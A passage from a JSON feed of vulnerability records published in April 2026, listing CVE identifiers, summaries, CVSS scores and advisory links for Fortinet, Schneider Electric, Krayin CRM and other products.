To workaround this issue, users can disable CMS_SAFE_MODE if untrusted template editing is not required, and restrict CMS template editing permissions to fully trusted administrators only.","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-m5qg-jc75-4jp6"],"published_time":"2026-04-14T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4832","summary":"CWE-798 Use of Hard-coded Credentials vulnerability exists that could cause unauthorized access to sensitive device information when an unauthenticated attacker is able to interrogate the SNMP port.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-03.pdf"],"published_time":"2026-04-14T16:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5713","summary":"The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. 
This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67","https://github.com/python/cpython/issues/148178","https://github.com/python/cpython/pull/148187","https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/"],"published_time":"2026-04-14T16:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39815","summary":"An improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Fortinet FortiDDoS-F 7.2.1 through 7.2.2 may allow an attacker to execute unauthorized code or commands via sending crafted HTTP requests","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-119"],"published_time":"2026-04-14T16:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39809","summary":"An improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Fortinet FortiClientEMS 7.4.0 through 7.4.5, FortiClientEMS 7.2.0 through 7.2.12, FortiClientEMS 7.0 all versions may allow an attacker to execute unauthorized code or commands via sending crafted 
requests","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-102"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39810","summary":"A use of hard-coded cryptographic key vulnerability in Fortinet FortiClientEMS 7.4.0 through 7.4.5 may allow an attacker to disclose information by decrypting a database dump.","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-107"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39811","summary":"An integer overflow or wraparound vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.3, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4 all versions, FortiWeb 7.2 all versions, FortiWeb 7.0 all versions may allow an attacker to cause a denial of service via <insert attack vector here>","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-108"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39812","summary":"An improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox PaaS 5.0.0 through 5.0.5, FortiSandbox PaaS 4.4.0 through 4.4.8, FortiSandbox PaaS 4.2 all versions may allow an attacker to execute unauthorized code or commands via <insert attack vector 
here>","cvss":4.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-110"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39813","summary":"A path traversal: '../filedir' vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8 may allow an attacker to escalate privileges via <insert attack vector here>","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-112"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39814","summary":"A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.1 through 7.4.12, FortiWeb 7.2.7 through 7.2.12, FortiWeb 7.0.10 through 7.0.12 may allow an attacker to execute unauthorized code or commands via <insert attack vector here>","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-114"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39808","summary":"An improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in Fortinet FortiSandbox 4.4.0 through 4.4.8 may allow an attacker to execute unauthorized code or commands via <insert attack vector 
here>","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-100"],"published_time":"2026-04-14T16:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38526","summary":"An authenticated arbitrary file upload vulnerability in the /admin/tinymce/upload endpoint of Webkul Krayin CRM v2.2.x allows attackers to execute arbitrary code via uploading a crafted PHP file.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38526","https://github.com/krayin/laravel-crm","https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38527","summary":"A Server-Side Request Forgery (SSRF) in the /settings/webhooks/create component of Webkul Krayin CRM v2.2.x allows attackers to scan internal resources via supplying a crafted POST request.","cvss":8.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38527","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38528","summary":"Krayin CRM v2.2.x was discovered to contain a SQL injection vulnerability via the rotten_lead parameter at 
/Lead/LeadDataGrid.php.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38528","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38529","summary":"A Broken Object-Level Authorization (BOLA) in the /Settings/UserController.php endpoint of Webkul Krayin CRM v2.2.x allows authenticated attackers to arbitrarily reset user passwords and perform a full account takeover via supplying a crafted HTTP request.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38529","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38530","summary":"A Broken Object-Level Authorization (BOLA) in the /Controllers/Lead/LeadController.php endpoint of Webkul Krayin CRM v2.2.x allows authenticated attackers to arbitrarily read, modify, and permanently delete any lead owned by other users via supplying a crafted GET request.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38530","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38532","summary":"A Broken Object-Level Authorization (BOLA) in the /Contact/Persons/PersonController.php endpoint of Webkul Krayin CRM v2.2.x allows authenticated attackers to arbitrarily read, 
modify, and permanently delete any contact owned by other users via supplying a crafted GET request.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38532","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38533","summary":"An improper authorization vulnerability in the /api/v1/users/{id} endpoint of Snipe-IT v8.4.0 allows authenticated attackers with the users.edit permission to modify sensitive authentication and account-state fields of other non-admin users via supplying a crafted PUT request.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38533","https://snipeitapp.com/"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2404","summary":"CWE-116 Improper Encoding or Escaping of Output vulnerability exists that could cause log injection and forged log when an attacker alters the POST /j_security check request payload.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2405","summary":"CWE-400 Uncontrolled Resource Consumption vulnerability exists that could cause excessive troubleshooting zip file creation and denial of service when a Web 
Admin user floods the system with POST /helpabout requests.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2399","summary":"CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could cause critical files to be overwritten with text data when a Web Admin user alters the POST /REST/upssleep request payload.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2400","summary":"CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability exists that could cause application user credentials to reset when a Web Admin user alters the POST /setPCBEDesc request payload.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2401","summary":"CWE-532 Insertion of Sensitive Information into Log File vulnerability exists that could cause confidential information to be exposed 
when a Web Admin user executes a malicious file provided by an attacker.","cvss":2.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.4,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2402","summary":"CWE-307 Improper Restriction of Excessive Authentication Attempts vulnerability exists that would allow an attacker to gain access to the user account by performing an arbitrary number of authentication attempts with different credentials on a sequence of requests to multiple endpoints.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2403","summary":"CWE-1284 Improper Validation of Specified Quantity in Input vulnerability exists that could cause Event and Data Log truncation impacting log integrity when a Web Admin user alters the POST /logsettings request payload.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22828","summary":"A heap-based buffer overflow vulnerability in Fortinet 
FortiAnalyzer Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.6.2 through 7.6.4 may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. Successful exploitation would require a large amount of effort in preparation because of ASLR and network segmentation.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-121"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23708","summary":"An improper authentication vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2 may allow an unauthenticated attacker to bypass authentication via replaying a captured 2FA request. The attack requires being able to intercept and decrypt authentication traffic and precise timing to replay the request before token expiration, which raises the attack complexity.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-101"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25691","summary":"An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox Cloud 5.0.4, FortiSandbox PaaS 5.0.4 may allow a privileged attacker with super-admin profile and CLI access to delete an arbitrary directory via crafted HTTP 
requests.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-115"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27316","summary":"An insufficiently protected credentials vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4 all versions, FortiSandbox PaaS 5.0.1 through 5.0.5 may allow an authenticated administrator to read LDAP server credentials via client-side inspection.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-113"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22154","summary":"An improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform a stored cross-site scripting (XSS) attack via crafted HTTP requests.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-117"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22155","summary":"A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 
7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an attacker to disclose information via <insert attack vector here>","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-106"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22573","summary":"An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5 all versions, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5 all versions, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform a path traversal attack via File Content Extraction actions.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-116"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22574","summary":"A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to 
retrieve the service account password via server address modification in the LDAP configuration.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-105"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22576","summary":"A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve passwords for multiple installed connectors via server address modification in connector configuration.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-104"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21741","summary":"A URL Redirection to Untrusted Site ('Open Redirect') [CWE-601] vulnerability in Fortinet FortiNAC-F 7.6.0 through 7.6.5, FortiNAC-F 7.4 all versions, FortiNAC-F 7.2 all versions may allow a remote privileged attacker with the system administrator role to redirect users to an arbitrary website via a crafted CSV 
file.","cvss":2.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-118"],"published_time":"2026-04-14T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21742","summary":"A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to view the cleartext password in responses to Secure Message Exchange and RADIUS queries, if configured.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-106"],"published_time":"2026-04-14T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65133","summary":"A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. 
An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65133/README.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65134","summary":"In manikandan580 School-management-system 1.0, a reflected cross-site scripting (XSS) vulnerability exists in /studentms/admin/contact-us.php via the email POST parameter.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65134/README.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65135","summary":"In manikandan580 School-management-system 1.0, a time-based blind SQL injection vulnerability exists in /studentms/admin/between-date-reprtsdetails.php through the fromdate POST parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-65135","https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65135/poc.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65136","summary":"In manikandan580 School-management-system 1.0, a reflected XSS vulnerability exists in /studentms/admin/contact-us.php via the pagedes POST 
parameter.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65136/README.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-68649","summary":"An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests.","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-120"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-63939","summary":"Improper input handling in /Grocery/search_products_itname.php, in anirudhkannan Grocery Store Management System 1.0, allows SQL injection via the sitem_name POST 
parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-63939"],"published_time":"2026-04-14T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65132","summary":"alandsilva26 hotel-management-php 1.0 is vulnerable to Cross Site Scripting (XSS) in /public/admin/edit_room.php which allows an attacker to inject and execute arbitrary JavaScript via the room_id GET parameter.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65132/README.md"],"published_time":"2026-04-14T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-59809","summary":"A server-side request forgery (ssrf) vulnerability [CWE-918] vulnerability in Fortinet FortiSOAR PaaS 7.6.4, FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.4, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to discover services running on local ports via crafted requests.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-103"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61624","summary":"An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] vulnerability in 
